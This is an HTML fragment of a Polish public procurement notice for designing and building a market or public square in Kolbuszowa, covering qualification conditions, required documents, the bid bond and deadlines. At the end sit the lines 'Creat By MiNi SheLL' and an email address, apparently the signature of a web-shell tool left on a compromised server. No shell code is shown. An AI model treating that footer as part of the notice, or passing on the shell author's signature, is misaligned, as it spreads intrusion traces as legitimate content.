<h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu o udzielenie zamówienia zamawiający może żądać podmiotowych środków dowodowych na<br/>potwierdzenie:<br/>1) Braku podstaw wykluczenia,<br/>2) Spełniania warunków udziału w postępowaniu lub kryteriów selekcji.<br/>2. Opis warunków udziału w postępowaniu:<br/>1) Warunek zdolności do występowania w obrocie gospodarczym – wpis do odpowiedniego rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowym zakresie.<br/>2) Warunek posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – zezwolenia,<br/>licencje, koncesje lub wpis do rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowy zakresie.<br/>3) Warunki dotyczące określonej sytuacji finansowej lub ekonomicznej.<br/>a. Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji finansowej lub ekonomicznej, jeżeli wykaże, że<br/>posiada ubezpieczenie od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż:<br/>800.000,00 PLN,<br/>4) Warunki dotyczące niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego:<br/>a. Wykonawca spełnia ten warunek udziału w postępowaniu /dotyczący kwalifikacji zawodowych, doświadczenia/, jeżeli<br/>wykaże, że dysponuje:<br/>a) Zespołem projektantów w składzie m.in.:<br/> Projektant branży architektonicznej – 1 osoba – wymagania:<br/> Sprawdzający branży architektonicznej – 1 osoba – wymagania:<br/> Projektant branży konstrukcyjnej – 1 osoba – wymagania:<br/> Sprawdzający branży konstrukcyjnej – 1 osoba – wymagania:<br/> Projektant branży sanitarnej – 1 osoba – wymagania:<br/> Sprawdzający branży sanitarnej – 1 osoba – wymagania:<br/> Projektant branży elektrycznej – 1 osoba – wymagania:<br/> Sprawdzający branży elektrycznej – 1 osoba – wymagania:<br/> Projektant branży drogowej – 1 osoba – wymagania:<br/> Sprawdzający branży drogowej – 1 osoba – wymagania:<br/>Osoby ta muszą posiadać właściwe uprawnienia– bez ograniczeń – wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo<br/>budowlane (Dz. U. z 2020 poz. 1333 z późn. zm) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia<br/>2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.<br/>U. poz. 831), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, które pozwalać będą na pełnienie funkcji w zakresie niniejszego zamówienia.<br/>b) Dysponowanie osobami do kierowania robotami – minimum:<br/> Kierownik budowy branży konstrukcyjnej – 1 osoba – wymagania:<br/> Kierownik robót branży sanitarnej – 1 osoba – wymagania:<br/> Kierownik robót branży elektrycznej – 1 osoba – wymagania:<br/> Kierownik robót branży drogowej – 1 osoba – wymagania:<br/>Osoby te muszą posiadać uprawnienia - bez ograniczeń – wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo<br/>budowlane (Dz. U. z 2020 poz. 1333 z późn. zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia<br/>2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.<br/>U. poz. 831), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, które pozwalać będą na pełnienie funkcji w zakresie niniejszego zamówienia.<br/>Osoby te muszą posiadać 5 letnie doświadczenie. Ilość lat doświadczenia należy liczyć od daty wystawienia uprawnień w<br/>przedmiotowej specjalności.<br/>b. Wykonawca spełni ten warunek udziału w postępowaniu /dotyczący doświadczenia/ jeżeli wykaże, że: wykonał w ciągu<br/>ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie):<br/>Wykazanie minimum 1 dokumentacji projektowych w zakresie budowy i/lub przebudowy i/lub rozbudowy placu targowego<br/>lub placu publicznego<br/>Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu, kwoty będą<br/>wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w stosunku do walut obcych<br/>ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu publikacji ogłoszenia w UZP.<br/> Wykazanie 1 roboty w zakresie budowy i/lub przebudowy i/lub rozbudowy placu targowego lub publicznego o wartości nie<br/>mniej niż 800.000,00 zł brutto.<br/> Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu, kwoty będą wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w<br/>stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu<br/>publikacji ogłoszenia w UZP. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie precyzuje warunków w przedmiotowy zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia zamawiający może żądać podmiotowych środków dowodowych na potwierdzenie:<br/>1) Braku podstaw wykluczenia, spełnienie warunków udziału w postępowaniu<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu Wykonawca składa aktualne na dzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – zał. Nr 1a do Rozdział I SWZ. Opis warunków<br/>udziału w postępowaniu:<br/>1) Warunki dotyczące określonej sytuacji finansowej lub ekonomicznej.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących sytuacji ekonomicznej lub finansowej zamawiający może żądać, w szczególności, następujących podmiotowych środków dowodowych:<br/>Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków<br/>dowodowych, o których mowa w lit. a, wykonawca składa inne podmiotowe środki dowodowe, które wystarczający sposób<br/>potwierdzają spełnienie opisanego przez zamawiającego warunku udziału w postępowaniu lub kryteriów selekcji dotyczącego<br/>sytuacji ekonomicznej lub finansowej.<br/>2) Warunki dotyczące niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego:<br/>a. Wykonawca spełnia ten warunek udziału w postępowaniu /dotyczący kwalifikacji zawodowych, doświadczenia/, jeżeli wykaże, że<br/>dysponuje:<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności<br/>technicznej lub zawodowej, zamawiający może, w zależności od charakteru, znaczenia, przeznaczenia lub zakresu robót<br/>budowlanych, dostaw lub usług, żądać następujących podmiotowych środków dowodowych: wykazu osób /wzór wykazu osób<br/>stanowi załącznik nr 1d -Rozdział I SWZ/.<br/>b. Wykonawca spełni ten warunek udziału w postępowaniu /dotyczący doświadczenia/ jeżeli wykaże, że: wykonał w ciągu ostatnich<br/>5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie):<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności<br/>technicznej lub zawodowej, zamawiający może, w zależności od charakteru, znaczenia, przeznaczenia lub zakresu robót<br/>budowlanych, dostaw lub usług, żądać następujących podmiotowych środków dowodowych:<br/>Wykazu usług wykonywanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przed podmiot, na rzecz którego usługi zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>/wzór wykazu usług stanowi załącznik nr 1f - Rozdział I SWZ/<br/>Wykazu robót budowlanych wykonywanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przed podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>/wzór wykazu robót budowlanych stanowi załącznik nr 1e -Rozdział I SWZ/</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie precyzuje warunków w przedmiotowy zakresie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty każdy wykonawca musi dołączyć:<br/>a. aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia – zał. Nr 1a do Rozdział I SWZ. W<br/>przypadku udostępnienia zasobów – oświadczenie podmiotu udostępniającego zasoby stanowi załącznik nr 1b Rozdział I<br/>SWZ. Informacje zawarte w oświadczeniu będą stanowić potwierdzenie, że wykonawca nie podlega wykluczeniu;<br/>b. aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – zał. Nr 1a do Rozdział I<br/>SWZ. W przypadku udostępnienia zasobów – oświadczenie podmiotu udostępniającego zasoby stanowi załącznik nr 1b<br/>Rozdział I SWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca spełnia warunki<br/>udziału w postępowaniu;<br/>c. dowód potwierdzenia wpłacenia wadium.<br/>UWAGA: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia o których mowa w<br/>ust. 1 pkt 1 i 2 składa każdy z wykonawców osobno.<br/>d. pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa<br/>pełnomocnik Wykonawcy - pełnomocnictwo zgodnie<br/>z działem VI rozdział II ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny winno być złożone w formie oryginału lub kopii<br/>poświadczonej notarialnie.<br/>e. Tabelę elementów rozliczeniowych sporządzoną w oparciu o wzór – załącznik nr 1g do oferty <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia przez Wykonawcę wadium w wysokości:<br/>- 15 000,00 zł (słownie: piętnaście tysięcy zł 00/100 )<br/>2. Zamawiający w przypadku udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 lub art. 388 pkt 2 lit. b i c, lub<br/>art. 415 ust. 2 pkt 5 i 6, określa kwotę wadium dla wartości zamówienia podstawowego.<br/>3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>5. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) Pieniądzu.<br/>2) Gwarancjach bankowych.<br/>3) Gwarancjach ubezpieczeniowych.<br/>4) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wspólne ubieganie się Wykonawców o udzielenie zamówienia: Wykonawcy mogą wspólnie<br/>ubiegać się o udzielenie zamówienia:a) W przypadku, o którym mowa w pkt 7,<br/>wykonawcyustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.b)Zamawiający nie może wymagać od wykonawców wspólnieubiegających się o<br/>udzielenie zamówienia posiadania określonej formy prawnej w celu złożenia oferty lub wniosku o<br/>dopuszczenie do udziału w postępowaniu.c) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ustawy Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.) istnieje możliwość<br/>dokonania zmiany umowy w formie aneksu pod warunkami:<br/>1) Zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy,<br/>w przypadku:<br/>a. wprowadzenia zmian w zakresie opracowania dokumentacji techniczno – projektowej, co może powodować brak<br/>możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy,<br/>b. przedłużającego się terminu uzyskania uzgodnień i pozwoleń osób trzecich w ramach projektowania,<br/>c. przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących po stronie Wykonawcy,<br/>d. powierzenia przez Zamawiającego wykonania zamówień dodatkowych lub robót zamiennych, jeżeli terminy ich<br/>powierzenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy,<br/>e. konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób<br/>trzecich albo właściwych organów,<br/>f. wystąpienia opóźnień wynikających z odmowy lub opóźnienia wydania przez organy administracji lub inne podmioty<br/>wymaganych decyzji, zezwoleń, uzgodnień, opinii z przyczyn niezawinionych przez Wykonawcę,<br/>g. wystąpienia opóźnień wynikających z konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu, lub organu,<br/>którego konieczności nie przewidywano przy zawieraniu umowy,<br/>Pozostałe zmiany umowy określono w § 35 Projektowanych postanowień umowy (rozdział III SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com